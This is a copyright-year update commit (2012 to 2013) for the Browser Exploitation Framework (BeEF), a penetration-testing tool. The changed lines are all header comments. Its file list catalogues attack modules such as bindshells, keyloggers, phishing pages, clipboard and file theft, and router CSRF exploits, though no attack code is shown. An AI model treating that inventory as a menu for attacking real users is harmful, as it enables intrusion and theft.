 modules/exploits/hp_ucmdb_add_user_csrf/command.js            | 2 +-
 modules/exploits/hp_ucmdb_add_user_csrf/config.yaml           | 2 +-
 modules/exploits/hp_ucmdb_add_user_csrf/module.rb             | 2 +-
 modules/exploits/jboss_jmx_upload_exploit/command.js          | 2 +-
 modules/exploits/jboss_jmx_upload_exploit/config.yaml         | 2 +-
 modules/exploits/jboss_jmx_upload_exploit/module.rb           | 2 +-
 .../exploits/local_host/activex_command_execution/command.js  | 2 +-
 .../exploits/local_host/activex_command_execution/config.yaml | 2 +-
 .../exploits/local_host/activex_command_execution/module.rb   | 2 +-
 modules/exploits/local_host/java_payload/command.js           | 2 +-
 modules/exploits/local_host/java_payload/config.yaml          | 2 +-
 modules/exploits/local_host/java_payload/module.rb            | 2 +-
 .../local_host/mozilla_nsiprocess_interface/command.js        | 2 +-
 .../local_host/mozilla_nsiprocess_interface/config.yaml       | 2 +-
 .../local_host/mozilla_nsiprocess_interface/module.rb         | 2 +-
 modules/exploits/local_host/safari_launch_app/command.js      | 2 +-
 modules/exploits/local_host/safari_launch_app/config.yaml     | 2 +-
 modules/exploits/local_host/safari_launch_app/module.rb       | 2 +-
 modules/exploits/local_host/window_mail_client_dos/command.js | 2 +-
 .../exploits/local_host/window_mail_client_dos/config.yaml    | 2 +-
 modules/exploits/local_host/window_mail_client_dos/module.rb  | 2 +-
 .../exploits/nas/freenas_reverse_root_shell_csrf/command.js   | 2 +-
 .../exploits/nas/freenas_reverse_root_shell_csrf/config.yaml  | 2 +-
 .../exploits/nas/freenas_reverse_root_shell_csrf/module.rb    | 2 +-
 modules/exploits/php-5.3.9-dos/command.js                     | 2 +-
 modules/exploits/php-5.3.9-dos/config.yaml                    | 2 +-
 modules/exploits/php-5.3.9-dos/module.rb                      | 2 +-
 modules/exploits/qnx_qconn_command_execution/command.js       | 2 +-
 modules/exploits/qnx_qconn_command_execution/config.yaml      | 2 +-
 modules/exploits/qnx_qconn_command_execution/module.rb        | 2 +-
 .../exploits/router/3com_officeconnect_cmd_exec/command.js    | 2 +-
 .../exploits/router/3com_officeconnect_cmd_exec/config.yaml   | 2 +-
 modules/exploits/router/3com_officeconnect_cmd_exec/module.rb | 2 +-
 modules/exploits/router/asmax_ar804gu_cmd_exec/command.js     | 2 +-
 modules/exploits/router/asmax_ar804gu_cmd_exec/config.yaml    | 2 +-
 modules/exploits/router/asmax_ar804gu_cmd_exec/module.rb      | 2 +-
 modules/exploits/router/bt_home_hub_csrf/command.js           | 2 +-
 modules/exploits/router/bt_home_hub_csrf/config.yaml          | 2 +-
 modules/exploits/router/bt_home_hub_csrf/module.rb            | 2 +-
 modules/exploits/router/cisco_e2400_csrf/command.js           | 2 +-
 modules/exploits/router/cisco_e2400_csrf/config.yaml          | 2 +-
 modules/exploits/router/cisco_e2400_csrf/module.rb            | 2 +-
 modules/exploits/router/comtrend_ct5367_csrf/command.js       | 2 +-
 modules/exploits/router/comtrend_ct5367_csrf/config.yaml      | 2 +-
 modules/exploits/router/comtrend_ct5367_csrf/module.rb        | 2 +-
 modules/exploits/router/comtrend_ct5624_csrf/command.js       | 2 +-
 modules/exploits/router/comtrend_ct5624_csrf/config.yaml      | 2 +-
 modules/exploits/router/comtrend_ct5624_csrf/module.rb        | 2 +-
 modules/exploits/router/dlink_dir_615_csrf/command.js         | 2 +-
 modules/exploits/router/dlink_dir_615_csrf/config.yaml        | 2 +-
 modules/exploits/router/dlink_dir_615_csrf/module.rb          | 2 +-
 modules/exploits/router/dlink_dsl500t_csrf/command.js         | 2 +-
 modules/exploits/router/dlink_dsl500t_csrf/config.yaml        | 2 +-
 modules/exploits/router/dlink_dsl500t_csrf/module.rb          | 2 +-
 modules/exploits/router/huawei_smartax_mt880/command.js       | 2 +-
 modules/exploits/router/huawei_smartax_mt880/config.yaml      | 2 +-
 modules/exploits/router/huawei_smartax_mt880/module.rb        | 2 +-
 modules/exploits/router/linksys_befsr41_csrf/command.js       | 2 +-
 modules/exploits/router/linksys_befsr41_csrf/config.yaml      | 2 +-
 modules/exploits/router/linksys_befsr41_csrf/module.rb        | 2 +-
 modules/exploits/router/linksys_wrt54g2_csrf/command.js       | 2 +-
 modules/exploits/router/linksys_wrt54g2_csrf/config.yaml      | 2 +-
 modules/exploits/router/linksys_wrt54g2_csrf/module.rb        | 2 +-
 modules/exploits/router/linksys_wrt54g_csrf/command.js        | 2 +-
 modules/exploits/router/linksys_wrt54g_csrf/config.yaml       | 2 +-
 modules/exploits/router/linksys_wrt54g_csrf/module.rb         | 2 +-
 modules/exploits/router/virgin_superhub_csrf/command.js       | 2 +-
 modules/exploits/router/virgin_superhub_csrf/config.yaml      | 2 +-
 modules/exploits/router/virgin_superhub_csrf/module.rb        | 2 +-
 modules/exploits/spring_framework_malicious_jar/command.js    | 2 +-
 modules/exploits/spring_framework_malicious_jar/config.yaml   | 2 +-
 modules/exploits/spring_framework_malicious_jar/module.rb     | 2 +-
 modules/exploits/switch/netgear_gs108t_csrf/command.js        | 2 +-
 modules/exploits/switch/netgear_gs108t_csrf/config.yaml       | 2 +-
 modules/exploits/switch/netgear_gs108t_csrf/module.rb         | 2 +-
 modules/exploits/vtiger_crm_upload_exploit/command.js         | 2 +-
 modules/exploits/vtiger_crm_upload_exploit/config.yaml        | 2 +-
 modules/exploits/vtiger_crm_upload_exploit/module.rb          | 2 +-
 modules/exploits/wanem_command_execution/command.js           | 2 +-
 modules/exploits/wanem_command_execution/config.yaml          | 2 +-
 modules/exploits/wanem_command_execution/module.rb            | 2 +-
 modules/exploits/xss/alienvault_ossim_3.1_xss/command.js      | 2 +-
 modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml     | 2 +-
 modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb       | 2 +-
 .../exploits/xss/cisco_collaboration_server_5_xss/command.js  | 2 +-
 .../exploits/xss/cisco_collaboration_server_5_xss/config.yaml | 2 +-
 .../exploits/xss/cisco_collaboration_server_5_xss/module.rb   | 2 +-
 modules/exploits/xss/serendipity_1.6_xss/command.js           | 2 +-
 modules/exploits/xss/serendipity_1.6_xss/config.yaml          | 2 +-
 modules/exploits/xss/serendipity_1.6_xss/module.rb            | 2 +-
 modules/exploits/zenoss_3x_command_execution/command.js       | 2 +-
 modules/exploits/zenoss_3x_command_execution/config.yaml      | 2 +-
 modules/exploits/zenoss_3x_command_execution/module.rb        | 2 +-
 modules/exploits/zenoss_add_user_csrf/command.js              | 2 +-
 modules/exploits/zenoss_add_user_csrf/config.yaml             | 2 +-
 modules/exploits/zenoss_add_user_csrf/module.rb               | 2 +-
 modules/exploits/zenoss_daemon_csrf/command.js                | 2 +-
 modules/exploits/zenoss_daemon_csrf/config.yaml               | 2 +-
 modules/exploits/zenoss_daemon_csrf/module.rb                 | 2 +-
 modules/host/clipboard_theft/command.js                       | 2 +-
 modules/host/clipboard_theft/config.yaml                      | 2 +-
 modules/host/clipboard_theft/module.rb                        | 2 +-
 modules/host/detect_cups/command.js                           | 2 +-
 modules/host/detect_cups/config.yaml                          | 2 +-
 modules/host/detect_cups/module.rb                            | 2 +-
 modules/host/detect_google_desktop/command.js                 | 2 +-
 modules/host/detect_google_desktop/config.yaml                | 2 +-
 modules/host/detect_google_desktop/module.rb                  | 2 +-
 modules/host/detect_protocol_handlers/command.js              | 2 +-
 modules/host/detect_protocol_handlers/config.yaml             | 2 +-
 modules/host/detect_protocol_handlers/module.rb               | 2 +-
 modules/host/detect_software/command.js                       | 2 +-
 modules/host/detect_software/config.yaml                      | 2 +-
 modules/host/detect_software/module.rb                        | 2 +-
 modules/host/detect_vm/command.js                             | 2 +-
 modules/host/detect_vm/config.yaml                            | 2 +-
 modules/host/detect_vm/module.rb                              | 2 +-
 modules/host/get_internal_ip/command.js                       | 2 +-
 modules/host/get_internal_ip/config.yaml                      | 2 +-
 modules/host/get_internal_ip/get_internal_ip.java             | 2 +-
 modules/host/get_internal_ip/module.rb                        | 2 +-
 modules/host/get_physical_location/command.js                 | 2 +-
 modules/host/get_physical_location/config.yaml                | 2 +-
 modules/host/get_physical_location/getGPSLocation.java        | 2 +-
 modules/host/get_physical_location/module.rb                  | 2 +-
 modules/host/get_registry_keys/command.js                     | 2 +-
 modules/host/get_registry_keys/config.yaml                    | 2 +-
 modules/host/get_registry_keys/module.rb                      | 2 +-
 modules/host/get_system_info/command.js                       | 2 +-
 modules/host/get_system_info/config.yaml                      | 2 +-
 modules/host/get_system_info/getSystemInfo.java               | 2 +-
 modules/host/get_system_info/module.rb                        | 2 +-
 modules/host/get_wireless_keys/command.js                     | 2 +-
 modules/host/get_wireless_keys/config.yaml                    | 2 +-
 modules/host/get_wireless_keys/module.rb                      | 2 +-
 modules/host/get_wireless_keys/wirelessZeroConfig.java        | 2 +-
 modules/host/hook_default_browser/command.js                  | 2 +-
 modules/host/hook_default_browser/config.yaml                 | 2 +-
 modules/host/hook_default_browser/module.rb                   | 2 +-
 modules/host/insecure_url_skype/command.js                    | 2 +-
 modules/host/insecure_url_skype/config.yaml                   | 2 +-
 modules/host/insecure_url_skype/module.rb                     | 2 +-
 modules/host/iphone_tel/command.js                            | 2 +-
 modules/host/iphone_tel/config.yaml                           | 2 +-
 modules/host/iphone_tel/module.rb                             | 2 +-
 modules/host/physical_location/command.js                     | 2 +-
 modules/host/physical_location/config.yaml                    | 2 +-
 modules/host/physical_location/module.rb                      | 2 +-
 modules/ipec/cross_site_printing/command.js                   | 2 +-
 modules/ipec/cross_site_printing/config.yaml                  | 2 +-
 modules/ipec/cross_site_printing/module.rb                    | 2 +-
 modules/ipec/dns_tunnel/command.js                            | 2 +-
 modules/ipec/dns_tunnel/config.yaml                           | 2 +-
 modules/ipec/dns_tunnel/module.rb                             | 2 +-
 modules/ipec/inter_protocol_imap/command.js                   | 2 +-
 modules/ipec/inter_protocol_imap/config.yaml                  | 2 +-
 modules/ipec/inter_protocol_imap/module.rb                    | 2 +-
 modules/ipec/inter_protocol_irc/command.js                    | 2 +-
 modules/ipec/inter_protocol_irc/config.yaml                   | 2 +-
 modules/ipec/inter_protocol_irc/module.rb                     | 2 +-
 modules/ipec/inter_protocol_posix_bindshell/command.js        | 2 +-
 modules/ipec/inter_protocol_posix_bindshell/config.yaml       | 2 +-
 modules/ipec/inter_protocol_posix_bindshell/module.rb         | 2 +-
 modules/ipec/inter_protocol_win_bindshell/command.js          | 2 +-
 modules/ipec/inter_protocol_win_bindshell/config.yaml         | 2 +-
 modules/ipec/inter_protocol_win_bindshell/module.rb           | 2 +-
 modules/metasploit/browser_autopwn/command.js                 | 2 +-
 modules/metasploit/browser_autopwn/config.yaml                | 2 +-
 modules/metasploit/browser_autopwn/module.rb                  | 2 +-
 modules/misc/google_search/command.js                         | 2 +-
 modules/misc/google_search/config.yaml                        | 2 +-
 modules/misc/google_search/module.rb                          | 2 +-
 modules/misc/iframe_keylogger/command.js                      | 2 +-
 modules/misc/iframe_keylogger/config.yaml                     | 2 +-
 modules/misc/iframe_keylogger/module.rb                       | 2 +-
 modules/misc/iframe_sniffer/command.js                        | 2 +-
 modules/misc/iframe_sniffer/config.yaml                       | 2 +-
 modules/misc/iframe_sniffer/module.rb                         | 2 +-
 modules/misc/invisible_iframe/command.js                      | 2 +-
 modules/misc/invisible_iframe/config.yaml                     | 2 +-
 modules/misc/invisible_iframe/module.rb                       | 2 +-
 modules/misc/local_file_theft/command.js                      | 2 +-
 modules/misc/local_file_theft/config.yaml                     | 2 +-
 modules/misc/local_file_theft/module.rb                       | 2 +-
 modules/misc/raw_javascript/command.js                        | 2 +-
 modules/misc/raw_javascript/config.yaml                       | 2 +-
 modules/misc/raw_javascript/module.rb                         | 2 +-
 modules/network/detect_soc_nets/command.js                    | 2 +-
 modules/network/detect_soc_nets/config.yaml                   | 2 +-
 modules/network/detect_soc_nets/module.rb                     | 2 +-
 modules/network/detect_tor/command.js                         | 2 +-
 modules/network/detect_tor/config.yaml                        | 2 +-
 modules/network/detect_tor/module.rb                          | 2 +-
 modules/network/dns_enumeration/command.js                    | 2 +-
 modules/network/dns_enumeration/config.yaml                   | 2 +-
 modules/network/dns_enumeration/module.rb                     | 2 +-
 modules/network/internal_network_fingerprinting/command.js    | 2 +-
 modules/network/internal_network_fingerprinting/config.yaml   | 2 +-
 modules/network/internal_network_fingerprinting/module.rb     | 2 +-
 modules/network/nat_pinning_irc/command.js                    | 2 +-
 modules/network/nat_pinning_irc/config.yaml                   | 2 +-
 modules/network/nat_pinning_irc/module.rb                     | 2 +-
 modules/network/ping_sweep/command.js                         | 2 +-
 modules/network/ping_sweep/config.yaml                        | 2 +-
 modules/network/ping_sweep/module.rb                          | 2 +-
 modules/network/ping_sweep_java/command.js                    | 2 +-
 modules/network/ping_sweep_java/config.yaml                   | 2 +-
 modules/network/ping_sweep_java/module.rb                     | 2 +-
 modules/network/ping_sweep_java/pingSweep.java                | 2 +-
 modules/network/port_scanner/command.js                       | 2 +-
 modules/network/port_scanner/config.yaml                      | 2 +-
 modules/network/port_scanner/module.rb                        | 2 +-
 modules/persistence/confirm_close_tab/command.js              | 2 +-
 modules/persistence/confirm_close_tab/config.yaml             | 2 +-
 modules/persistence/confirm_close_tab/module.rb               | 2 +-
 modules/persistence/iframe_above/command.js                   | 2 +-
 modules/persistence/iframe_above/config.yaml                  | 2 +-
 modules/persistence/iframe_above/module.rb                    | 2 +-
 modules/persistence/man_in_the_browser/command.js             | 2 +-
 modules/persistence/man_in_the_browser/config.yaml            | 2 +-
 modules/persistence/man_in_the_browser/module.rb              | 2 +-
 modules/persistence/popunder_window/command.js                | 2 +-
 modules/persistence/popunder_window/config.yaml               | 2 +-
 modules/persistence/popunder_window/module.rb                 | 2 +-
 modules/phonegap/phonegap_beep/command.js                     | 2 +-
 modules/phonegap/phonegap_beep/config.yaml                    | 2 +-
 modules/phonegap/phonegap_beep/module.rb                      | 2 +-
 modules/phonegap/phonegap_check_connection/command.js         | 2 +-
 modules/phonegap/phonegap_check_connection/config.yaml        | 2 +-
 modules/phonegap/phonegap_check_connection/module.rb          | 2 +-
 modules/phonegap/phonegap_detect/command.js                   | 2 +-
 modules/phonegap/phonegap_detect/config.yaml                  | 2 +-
 modules/phonegap/phonegap_detect/module.rb                    | 2 +-
 modules/phonegap/phonegap_file_upload/command.js              | 2 +-
 modules/phonegap/phonegap_file_upload/config.yaml             | 2 +-
 modules/phonegap/phonegap_file_upload/module.rb               | 2 +-
 modules/phonegap/phonegap_geo_locate/command.js               | 2 +-
 modules/phonegap/phonegap_geo_locate/config.yaml              | 2 +-
 modules/phonegap/phonegap_geo_locate/module.rb                | 2 +-
 modules/phonegap/phonegap_list_files/command.js               | 2 +-
 modules/phonegap/phonegap_list_files/config.yaml              | 2 +-
 modules/phonegap/phonegap_list_files/module.rb                | 2 +-
 modules/phonegap/phonegap_persist_resume/command.js           | 2 +-
 modules/phonegap/phonegap_persist_resume/config.yaml          | 2 +-
 modules/phonegap/phonegap_persist_resume/module.rb            | 2 +-
 modules/phonegap/phonegap_persistence/command.js              | 2 +-
 modules/phonegap/phonegap_persistence/config.yaml             | 2 +-
 modules/phonegap/phonegap_persistence/module.rb               | 2 +-
 modules/phonegap/phonegap_start_record_audio/command.js       | 2 +-
 modules/phonegap/phonegap_start_record_audio/config.yaml      | 2 +-
 modules/phonegap/phonegap_start_record_audio/module.rb        | 2 +-
 modules/phonegap/phonegap_stop_record_audio/command.js        | 2 +-
 modules/phonegap/phonegap_stop_record_audio/config.yaml       | 2 +-
 modules/phonegap/phonegap_stop_record_audio/module.rb         | 2 +-
 modules/social_engineering/clickjacking/command.js            | 2 +-
 modules/social_engineering/clickjacking/config.yaml           | 2 +-
 modules/social_engineering/clickjacking/module.rb             | 2 +-
 modules/social_engineering/clippy/command.js                  | 2 +-
 modules/social_engineering/clippy/config.yaml                 | 2 +-
 modules/social_engineering/clippy/module.rb                   | 2 +-
 modules/social_engineering/fake_flash_update/command.js       | 2 +-
 modules/social_engineering/fake_flash_update/config.yaml      | 2 +-
 modules/social_engineering/fake_flash_update/module.rb        | 2 +-
 modules/social_engineering/gmail_phishing/command.js          | 2 +-
 modules/social_engineering/gmail_phishing/config.yaml         | 2 +-
 modules/social_engineering/gmail_phishing/module.rb           | 2 +-
 modules/social_engineering/lcamtuf_download/command.js        | 2 +-
 modules/social_engineering/lcamtuf_download/config.yaml       | 2 +-
 modules/social_engineering/lcamtuf_download/module.rb         | 2 +-
 modules/social_engineering/pretty_theft/command.js            | 2 +-
 modules/social_engineering/pretty_theft/config.yaml           | 2 +-
 modules/social_engineering/pretty_theft/module.rb             | 2 +-
 modules/social_engineering/simple_hijacker/command.js         | 2 +-
 modules/social_engineering/simple_hijacker/config.yaml        | 2 +-
 modules/social_engineering/simple_hijacker/module.rb          | 2 +-
 .../social_engineering/simple_hijacker/templates/amazon.js    | 2 +-
 .../simple_hijacker/templates/chromecertbeggar.js             | 2 +-
 .../simple_hijacker/templates/chromecertbeggar2.js            | 2 +-
 .../simple_hijacker/templates/confirmbox.js                   | 2 +-
 .../simple_hijacker/templates/credential.js                   | 2 +-
 modules/social_engineering/tabnabbing/command.js              | 2 +-
 modules/social_engineering/tabnabbing/config.yaml             | 2 +-
 modules/social_engineering/tabnabbing/module.rb               | 2 +-
 test/common/beef_test.rb                                      | 2 +-
 test/common/test_constants.rb                                 | 2 +-
 test/common/ts_common.rb                                      | 2 +-
 test/integration/check_environment.rb                         | 2 +-
 test/integration/tc_debug_modules.rb                          | 2 +-
 test/integration/tc_login.rb                                  | 2 +-
 test/integration/ts_integration.rb                            | 2 +-
 test/thirdparty/msf/unit/check_environment.rb                 | 2 +-
 test/thirdparty/msf/unit/tc_metasploit.rb                     | 2 +-
 test/thirdparty/msf/unit/ts_metasploit.rb                     | 2 +-
 test/unit/core/filter/tc_base.rb                              | 2 +-
 test/unit/core/filter/tc_command.rb                           | 2 +-
 .../core/main/network_stack/handlers/dynamicreconstruction.rb | 2 +-
 test/unit/core/tc_api.rb                                      | 2 +-
 test/unit/core/tc_autorun.rb                                  | 2 +-
 test/unit/core/tc_bootstrap.rb                                | 2 +-
 test/unit/core/tc_core.rb                                     | 2 +-
 test/unit/core/tc_loader.rb                                   | 2 +-
 test/unit/core/tc_logger.rb                                   | 2 +-
 test/unit/core/tc_modules.rb                                  | 2 +-
 test/unit/core/tc_obfuscation.rb                              | 2 +-
 test/unit/core/tc_social_engineering.rb                       | 2 +-
 test/unit/extensions/tc_event_logger.rb                       | 2 +-
 test/unit/extensions/tc_hackverter.rb                         | 2 +-
 test/unit/extensions/tc_hooks.rb                              | 2 +-
 test/unit/extensions/tc_ipec_tunnel.rb                        | 2 +-
 test/unit/extensions/tc_proxy.rb                              | 2 +-
 test/unit/extensions/tc_requester.rb                          | 2 +-
 test/unit/extensions/tc_vnc.rb                                | 2 +-
 test/unit/extensions/tc_xssrays.rb                            | 2 +-
 test/unit/tc_filesystem.rb                                    | 2 +-
 test/unit/tc_grep.rb                                          | 2 +-
 test/unit/ts_unit.rb                                          | 2 +-
 update-beef                                                   | 2 +-
 710 files changed, 714 insertions(+), 714 deletions(-)

diff --git a/BeEFLive.sh b/BeEFLive.sh
index 14fedd039..45c00c2c9 100644
--- a/BeEFLive.sh
+++ b/BeEFLive.sh
@@ -1,6 +1,6 @@
 #!/bin/bash
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'home/beef/doc/COPYING' for copying permission
 #
@@ -21,7 +21,7 @@ echo "======================================"
 echo "          BeEF Live CD   "
 echo "======================================"
 echo ""
-echo "Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net"
+echo "Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net"
 echo "Browser Exploitation Framework (BeEF) - http://beefproject.com"
 echo "See the file 'home/beef/doc/COPYING' for copying permission"
 echo ""
diff --git a/Gemfile b/Gemfile
index 06cf6daff..c86d6c0a2 100644
--- a/Gemfile
+++ b/Gemfile
@@ -1,7 +1,7 @@
 # BeEF's Gemfile
 
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/INSTALL.txt b/INSTALL.txt
index 552ccfc6d..421d766c2 100644
--- a/INSTALL.txt
+++ b/INSTALL.txt
@@ -1,6 +1,6 @@
 ===============================================================================
    
-    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 
diff --git a/README b/README
index e91bcb000..c584cbd55 100644
--- a/README
+++ b/README
@@ -1,6 +1,6 @@
 ===============================================================================
    
-    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 
diff --git a/README.mkd b/README.mkd
index 498d190c9..fdeb6146d 100644
--- a/README.mkd
+++ b/README.mkd
@@ -1,6 +1,6 @@
 ===============================================================================
    
-    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 
diff --git a/Rakefile b/Rakefile
index d110ed104..31c28e16d 100644
--- a/Rakefile
+++ b/Rakefile
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/VERSION b/VERSION
index b4a0a0eda..ded06bdff 100644
--- a/VERSION
+++ b/VERSION
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/beef b/beef
index b8a1abefe..c8d8db1fe 100755
--- a/beef
+++ b/beef
@@ -1,7 +1,7 @@
 #!/usr/bin/env ruby
 
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/config.yaml b/config.yaml
index 567ab7b05..54d90ada0 100644
--- a/config.yaml
+++ b/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/api.rb b/core/api.rb
index 162805b9f..880e326e5 100644
--- a/core/api.rb
+++ b/core/api.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/api/extension.rb b/core/api/extension.rb
index 87121854c..bc2a6594f 100644
--- a/core/api/extension.rb
+++ b/core/api/extension.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/api/extensions.rb b/core/api/extensions.rb
index 37833042a..bb530bd41 100644
--- a/core/api/extensions.rb
+++ b/core/api/extensions.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/api/main/configuration.rb b/core/api/main/configuration.rb
index 119ea40c2..ef6d7966a 100644
--- a/core/api/main/configuration.rb
+++ b/core/api/main/configuration.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/api/main/migration.rb b/core/api/main/migration.rb
index 298d29148..ec7d6eb4a 100644
--- a/core/api/main/migration.rb
+++ b/core/api/main/migration.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/api/main/network_stack/assethandler.rb b/core/api/main/network_stack/assethandler.rb
index 04d96c1c9..9bcb5df48 100644
--- a/core/api/main/network_stack/assethandler.rb
+++ b/core/api/main/network_stack/assethandler.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/api/main/server.rb b/core/api/main/server.rb
index 7ff96ff24..78df7c5bd 100644
--- a/core/api/main/server.rb
+++ b/core/api/main/server.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/api/main/server/hook.rb b/core/api/main/server/hook.rb
index b6229c46b..d00633f2c 100644
--- a/core/api/main/server/hook.rb
+++ b/core/api/main/server/hook.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/api/module.rb b/core/api/module.rb
index a699e915f..5b0ba140a 100644
--- a/core/api/module.rb
+++ b/core/api/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/api/modules.rb b/core/api/modules.rb
index 22edb88e5..712037e90 100644
--- a/core/api/modules.rb
+++ b/core/api/modules.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/bootstrap.rb b/core/bootstrap.rb
index 4244f20db..8d227cee6 100644
--- a/core/bootstrap.rb
+++ b/core/bootstrap.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/core.rb b/core/core.rb
index 2adf0c1cb..d150c4787 100644
--- a/core/core.rb
+++ b/core/core.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/extension.rb b/core/extension.rb
index 3c7f8dd16..c9535d33d 100644
--- a/core/extension.rb
+++ b/core/extension.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/extensions.rb b/core/extensions.rb
index 5b0c0390c..960599b10 100644
--- a/core/extensions.rb
+++ b/core/extensions.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/filters.rb b/core/filters.rb
index be9eda17e..88adc8118 100644
--- a/core/filters.rb
+++ b/core/filters.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
